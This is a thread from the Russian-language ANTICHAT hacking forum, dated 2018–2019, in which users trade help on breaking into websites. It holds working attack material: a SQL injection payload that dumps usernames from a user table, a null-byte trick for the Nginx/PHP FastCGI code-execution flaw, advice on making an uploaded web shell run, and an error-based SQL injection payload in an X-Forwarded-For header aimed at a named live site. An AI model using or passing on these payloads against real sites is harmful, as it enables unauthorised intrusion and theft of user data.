ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

31.12.2018, 01:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 96779
Репутация:
5
|
|
union select 1,2,3,(select@%20from(select@:=0x00,(select 1 from(select*from user ORDER BY userid ASC limit 0,5)w where(@:=concat(@,0x3c62723e,username))))q) как тут задать бд к которой обращаться ?
|
|
|
|

03.01.2019, 17:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 521
Репутация:
0
|
|
Нужна помощь с реализацией уязвимости. Acunetix Web Scanner находит уязвимость:
Nginx PHP code execution via FastCGI
Vulnerability description
A critical security issue was reported on servers that run Nginx and PHP via FastCGI. This issue may allow attackers to execute their own PHP code on the system.The problem is not caused by nginx itself, it's related with the PHP option cgi.fix_pathinfo. When this option is enabled, PHP will rewrite SCRIPT_FILENAME and PATH_INFO parameters. When combined with Nginx, this turns into a security issue.
This vulnerability affects Web Server.
Discovered by: Scripting (Nginx_PHP_FastCGI_Code_Execution_File_Upload.scri pt).
Насколько понял, данная уязвимость позволяет выполнить произвольный PHP. Пошарился по гуглу, ничего интересного не нашел. Подскажите что почитать или в какую сторону копать.
|
|
|
|

05.01.2019, 03:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 5363
Репутация:
12
|
|
Сообщение от romanshkabo
romanshkabo said:
↑
Нужна помощь с реализацией уязвимости. Acunetix Web Scanner находит уязвимость:
Nginx PHP code execution via FastCGI
Vulnerability description
A critical security issue was reported on servers that run Nginx and PHP via FastCGI. This issue may allow attackers to execute their own PHP code on the system.The problem is not caused by nginx itself, it's related with the PHP option cgi.fix_pathinfo. When this option is enabled, PHP will rewrite SCRIPT_FILENAME and PATH_INFO parameters. When combined with Nginx, this turns into a security issue.
This vulnerability affects
Web Server
.
Discovered by: Scripting (Nginx_PHP_FastCGI_Code_Execution_File_Upload.scri pt).
Насколько понял, данная уязвимость позволяет выполнить произвольный PHP. Пошарился по гуглу, ничего интересного не нашел. Подскажите что почитать или в какую сторону копать.
очень древний баян, года так 10, добавь %00.php или /x00.php
|
|
|
|

05.01.2019, 12:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 1385
Репутация:
0
|
|
Можете подсказать? Залил шелл, но он не исполняет php код. Выводит только html. Выглядит это вот так. Вопрос, как заставить работать php? 
|
|
|
|

05.01.2019, 13:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 47768
Репутация:
119
|
|
Сообщение от etime
etime said:
↑
Можете подсказать? Залил шелл, но он не исполняет php код. Выводит только html. Выглядит это вот так. Вопрос, как заставить работать php?
Мрачно выглядит...
Попробуй сначала залить шелла с расширением .txt и посмотри корректность кода. Если всё корректно, то придется воевать с .htaccess в директории, или искать другие директории под запись.
|
|
|
|

05.01.2019, 13:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 1385
Репутация:
0
|
|
Сообщение от Gorbachev
Gorbachev said:
↑
Мрачно выглядит...
Попробуй сначала залить шелла с расширением .txt и посмотри корректность кода. Если всё корректно, то придется воевать с .htaccess в директории, или искать другие директории под запись.
Спасибо, попробую.
|
|
|
|

09.01.2019, 15:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 521
Репутация:
0
|
|
Сообщение от neur0funk
neur0funk said:
↑
очень древний баян, года так 10, добавь %00.php или /x00.php
Можно чуть подробней. Где почитать можно? При обращении к site.ru/ind%ex.php получаю 400 ошибку. В остальных случаях 404
|
|
|
|

09.01.2019, 16:41
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме: 11937
Репутация:
0
|
|
|
|
|

15.01.2019, 15:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 61136
Репутация:
32
|
|
Не получается сделать вывод error based, может что-то фильтруется ?
Сайт: http://drop-bux.ru
Уязвимость в заголовках headers
X-Forwarded-For: 1'"
|
|
|
|

15.01.2019, 16:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 47768
Репутация:
119
|
|
Сообщение от WallHack
WallHack said:
↑
Не получается сделать вывод error based, может что-то фильтруется ?
Сайт:
http://drop-bux.ru
Уязвимость в заголовках headers
X-Forwarded-For:
1'"
Все стандартно крутится: X-Forwarded-For: 123"\'and(extractvalue(1,concat(0x3b,(select(versi on())))))#
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|